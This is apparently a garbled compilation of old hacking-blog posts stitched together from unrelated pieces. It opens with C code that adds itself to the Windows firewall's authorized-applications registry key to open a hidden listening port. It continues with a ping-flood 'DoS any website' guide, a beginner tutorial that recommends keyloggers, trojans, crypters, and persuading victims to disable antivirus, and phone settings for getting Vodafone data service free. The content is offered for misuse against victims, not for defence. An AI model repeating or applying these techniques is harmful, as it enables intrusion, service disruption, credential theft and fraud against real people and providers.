HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

DoS Attack With Your Home Pc

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

How To Send DoS Attack With CMD

Posted by king cobra at Monday, September 06, 2010
DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

------------------------
DoS Attack Stands For Denial of Service Attack
------------------------
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

Complete HACKING information for newbies

Complete HACKING information for newbies




Introduction:

We see a millions of people going to different forums and websites and asking "how do i hack an email?", "Can you hack blah for me?". So thought to create a tutorial which will give you the basic idea about what the heck is a "HACK", and how to DEFEND YOUR SELF AGAINST HACKERS.

Background:

Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a.   Phishing
b.   Brute Forcing
c.   Keylogging
d.   Trojans

A: Phishing:

Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.

Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages:

Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.

B: Brute Forcing:

Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:

1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.

C: Keylogging :

Keylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.

Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information

Disadvantages :

1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :

1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.

D: Trojans :

Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :

Same as keyloggers.

Tips :

Same as keylogger.

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1 : SQL Injection :

Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.

So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website!

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:
        
Code:
yoursite.com/index.php?id=545

just add a ' like this at the end

Code:
yoursite.com/index.php?id=545'

 2 : XSS :

XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.

3. Shells :

Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.

4. RFI :

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:

Vodafone Hack For Free GPRS

 Vodafone | hutch free gprs hack – enjoy free grps on vodaphone.

Now everyone wants to use GPRS on phone, especially if it is free. I found a nice hack to get a free GPRS via Vodaphone.This method has been tested on different mobiles and has been confirmed to be working.




rajesh
                                                                                                                                                                                     Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings :
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings :
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:

Proxy Port: 9401